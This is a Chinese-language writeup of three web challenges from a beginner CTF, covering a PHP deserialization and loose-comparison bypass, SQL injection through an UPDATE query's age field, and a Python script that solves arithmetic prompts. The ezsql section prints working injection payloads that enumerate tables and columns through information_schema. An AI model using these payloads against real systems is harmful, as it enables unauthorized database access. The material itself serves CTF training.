HUBUCTF 2022新生赛Writeup

既然是母校，那一定要好好对待~    2024-01-13 22:42:34

---

WEB  [HUBUCTF 2022 新生赛]checkin

题目链接：checkin

原题

 <?php
show_source(__FILE__);
$username  = "this_is_secret";
$password  = "this_is_not_known_to_you";
include("flag.php");//here I changed those two
$info = isset($_GET['info'])? $_GET['info']: "" ;
$data_unserialize = unserialize($info);
if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
    echo $flag;
}else{
    echo "username or password error!";

}

?>
username or password error!

一道字符串反序列化的题，相关构造就可以。

<?php

$info=['username'=>"this_is_secret",'password'=>"this_is_not_known_to_you"];
echo urlencode(serialize($info));
?>

本来信心满满，但是又被现实击垮。还是不行。原题所改变了值。结合下面的弱比较，如果改完的字符串没有以数字开头就可以用0弱比较绕过。

把脚本的两个参数改成数字0既可以绕过。

得到flag:NSSCTF{df0b1d5c-d3e8-426d-887a-3eabe68f61bb}

---

web  [HUBUCTF 2022 新生赛]ezsql

原题链接：easysql

经过测试admin" or 1=1--+注册后,可以直接进去，但是翻遍了没有一点信息，应该是覆盖了原来的信息，目录遍历一下吧。

看到了www.tar.gz，源码泄露

好多源码，代码审计！

查看update.php，

$query=$mysqli->query("update users set age=$_POST[age],nickname='$_POST[nickname]',description='$_POST[description]' where id=$_SESSION[id]");

我们只要在中间加上password=***,token置空，就能更改password了。

改完还是不行，估计密码不是明文存储。这个输入点还可以直接使用sql语句,注意我的问题，这么写肯定是错的。

foreach($_POST as $key=>$value){
    $_POST[$key]=addslashes($value);
} update.php中也有这句话，它将双引号单引号都过滤了。注入点为什么在age呢，因为age必须是整数，那么他就可能将是双引号去掉了！。

得到数据库名demo2

nickname=(select 1)&age=(select 1),description=(select group_concat(table_name) from information_schema.tables where table_schema=database())#&token=4b29f27a4354d745055045c0c7c97891

得到表名：user.注意每次的sessionid都不一样，不能重放。

nickname=1&age=(select 1),description=(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)#&token=3e9be9bb4eb8225f70379a9c57cd83b5

之后用表名查列名，但是我不知道表名为什么非要用16进制，就像下面的图一样，总之，最后然后获取密码，重开环境。

---

[HUBUCTF 2022 新生赛]Calculate

意思很明显，编写脚本。先抓个包，cookie是必须带的

参考https://blog.csdn.net/Jayjay___/article/details/134805314,    个人进行了改进。

# -*- coding:utf-8 -*-
"""
作者:Wang Xinwei
日期:2024年01月18日
"""
import requests
import time
import re

url = 'http://node5.anna.nssctf.cn:28169/'
res = requests.session()      #创建session对象，用来保存当前会话的持续有效性。不创建也可以调用对应的方法发送请求，但是没有cookie，那就无法记录答题数量。

for i in range(1, 21):
    print(f"正在执行第{i}次------")
    math = ""

    response = res.get(url)   #发get包，获取题目

    resTest = response.text            #获取返回包的内容
    li=re.findall(">([0-9*/+-])<",resTest)
    math="".join(li)
    print(math)
    num = eval(math)       #计算数学表达式的值

    myData = {   #构造的POST数据
        'ans': num
    }
    time.sleep(1)  # 睡一秒
    response = res.post(url, data=myData) #发post包，提交答案

    if "NSSCTF{" in response.text:       #如果返回包里面有flag
        print("Flaggggggggg: ", response.text)
        exit() # 退出当前程序，也可以break